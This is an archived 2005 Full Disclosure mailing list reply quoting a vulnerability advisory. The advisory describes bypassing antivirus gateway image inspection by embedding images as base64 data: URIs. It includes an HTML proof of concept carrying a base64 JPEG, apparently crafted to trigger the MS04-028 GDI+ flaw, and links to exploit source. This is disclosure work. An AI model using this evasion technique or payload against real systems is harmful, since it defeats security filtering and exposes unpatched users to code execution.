Full Disclosure mailing list archives

Re: Multi-vendor AV gateway image inspection bypass vulnerability

From: Danny <nocmonkey () gmail com>
Date: Tue, 11 Jan 2005 14:14:17 -0500

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<dbounds () intrusense com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to
bypass anti-virus
(as well other security technologies such as IDS and IPS) inspection of
HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding
image content within
the URL scheme. A remote attack may encode a malicious image within the
body of an HTML
formatted document to circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image
that will attempt (and fail
without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
The image itself is detected
by all AV gateway engines tested (Trend, Sophos and McAfee), however,
when the same image
is base64 encoded using the technique described in RFC 2397 (documented
below), inspection
is not performed and is delivered rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL
scheme; Firefox, Safari,
Mozilla and Opera do and will render the data and thus successfully
execute the payload if the necessary
OS and/or application patches have not been applied.

## BEGIN HTML ##

<html>
<body>
<img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
Z">
</body>
</html>

## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are
and have been for several months.  If you have not yet applied them,
you have your own
negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
platform testing.


I believe TrendMicro's OfficeScan (client-server scanner) will catch
it, but I am not sure about their gateway device. What was their
response?

...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
  - Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
    - Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
    - Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)